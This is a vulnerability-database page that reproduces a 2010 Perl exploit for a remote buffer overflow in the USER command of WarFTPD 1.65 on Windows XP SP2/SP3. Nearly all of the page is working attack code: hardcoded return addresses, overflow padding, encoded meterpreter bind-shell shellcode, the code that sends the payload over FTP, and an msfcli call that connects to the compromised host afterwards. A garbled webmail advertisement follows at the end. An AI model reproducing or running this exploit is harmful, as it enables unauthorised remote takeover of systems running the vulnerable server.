WarFTPD 1.65 USER remote buffer overflow

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050504 漏洞类型
发布时间 2010-06-30 更新时间 2010-06-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010060128
|漏洞详情
漏洞细节尚未披露
|漏洞EXP



# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]
# Date: 26/6/2010
# Author: mr.pr0n
# Software Link: [download link if available]
# Version: WarFTPD 1.65
# Tested on: Windows XP Pro SP2 / SP3 [English]
# CVE : [if exists]
# Code :
 
#!/usr/bin/perl

use IO::Socket;

print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n";
print "#    Target App: WarFTPD 1.65  (USER).                    #\n";
print "#    Attack    : Remote Buffer Overflow Exploit.             #\n";
print "#    Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3].    #\n";
print "#----------------------------------------[http://www.p0wnbox.com]-------#\n";
print "\nEnter your target's IP (e.g.: 192.168.0.123)\n";
print "> ";
$target=<STDIN>;
chomp($target);
print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n";
print "> ";
$sp=<STDIN>;
chomp($sp);

if ($sp == 2) {
          # Lets define the RET, if our target is Windows SP2.
          $RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret
          }
          elsif ($sp == 3) 
            {
                        # Lets define the RET, if our target is Windows SP3.
            $RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret
            } 
else {
     print "[-] Wrong version of Windows XP Service Pack!\n";
     exit(1);
     }

# We need 485 bytes to override the EIP.
$junkBytes     = "\x41" x 485; # Send 485 "A".

# We need 569 bytes to override the Seh Handler.
$junkBytes_2     = "\x41" x 84; # Send(485 + 84 =)569 "A".


#-----------------------------------------------------------------------------------------------------------------------# 
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444  R | msfencode -b '\x00\x0a\x0d\x40' -t c    #
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)                                 #
#-----------------------------------------------------------------------------------------------------------------------# 

#-----------------------------------------------# 
# windows/meterpreter/bind_tcp - 326 bytes     #
# http://www.metasploit.com             #
# Encoder: x86/shikata_ga_nai             #
# Bad Characters: \x00, \x0a, \x0d, \x40     #
# LPORT=4444                     #
#-----------------------------------------------#

$shellcode = 
"\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09".
"\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80".
"\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16".
"\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a".
"\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b".
"\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85".
"\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49".
"\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0".
"\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f".
"\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6".
"\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5".
"\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f".
"\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd".
"\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08".
"\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87".
"\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20".
"\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66".
"\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d".
"\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f".
"\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8".
"\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8".
"\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";

if ($socket = IO::Socket::INET->new
     (PeerAddr => $target,
         # Default FTP Port!
     PeerPort => "21", 
     Proto => "TCP"))
        { 
        print "\n[*] Sending Buffer at: $target ...\n";
                # This is our Buffer, we are sending a long username with the USER ftp command.
        $exploit  = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode;
        print $socket $exploit."\r\n";
                # Hey, wait only for a sec!
        sleep(1);
        close($socket);
        print "[*] Exploitation Done!\n";

                # Connect to the victim with metasploit.
                $command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n";
                system ($command);
        }

else
    {
    print "[-] Connection to $target failed!\n";
    }

# That' all Folks ;)

 		 	   		  
_________________________________________________________________
?? email ??? ??? ????? ????? ?? ???????. ????????? ?????? ?? Windows Live Hotmail.
https://signup.live.com/signup.aspx?id=60969